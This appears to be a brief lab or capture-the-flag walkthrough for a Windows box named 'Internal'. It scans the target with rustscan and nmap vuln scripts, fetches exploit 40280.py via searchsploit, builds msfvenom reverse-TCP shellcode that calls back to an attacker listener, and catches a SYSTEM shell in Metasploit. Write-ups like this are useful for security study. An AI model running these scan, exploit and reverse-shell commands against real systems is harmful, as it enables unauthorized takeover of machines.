Internal
nmap
mkdir nmap
sudo rustscan -a 192.168.201.40 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan --scripts vuln
Looks like there's a CVE detected by nmap

Exploitation
Let's find the source code of the exploit of this CVE.

Mirror the exploit to your local machine
searchsploit -m windows/remote/40280.py
Create shellcode with msfvenom
as per exploit instruction.
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.201 LPORT=4444 EXITFUNC=thread -f python -v shell

Copy the shellcode and replace it on the source code

Open msfconsole
and execute the following
use exploit/multi/handler
set payload windows/shell/reverse_tcp
set lhost tun0
set exitfunc thread
run

Run the exploit
python 40280.py 192.168.201.40
And you should receive your nt authority\system
shell.

Last updated
Was this helpful?